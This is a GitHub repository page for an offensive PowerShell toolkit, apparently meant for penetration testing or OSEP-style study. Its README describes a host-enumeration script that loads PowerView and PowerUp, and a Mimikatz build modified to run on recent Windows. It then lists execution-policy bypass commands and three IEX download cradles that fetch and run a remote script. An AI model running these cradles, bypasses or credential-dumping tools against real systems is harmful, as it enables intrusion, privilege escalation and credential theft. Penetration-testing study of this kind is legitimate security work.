Skip to content

conma293/mvp

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

134 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

1.ps1 does basic enumeration of host and pulls down Powerview and PowerUp modules from their original source and attempts to load as modules.

Invoke-Mimikatz_MOD.ps1 has been modded to execute on recent Windows versions based on - apache/caldera#38 (comment)

Bypass EP

Start PowerShell from cmd.exe:

powershell.exe -ep bypass

If already running:

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Restricted

$Env:PSExecutionPolicyPreference = 'Bypass'

Run Script cradles

iex (iwr "https://raw.githubusercontent.com/conma293/mvp/main/1.ps1")

IEX (Invoke-WebRequest -Uri "https://raw.githubusercontent.com/conma293/mvp/main/1.ps1").Content

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/conma293/mvp/main/1.ps1')

More Cradles and general good refs

https://github.com/In3x0rabl3/OSEP/blob/main/osep_reference.md#download-cradle

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors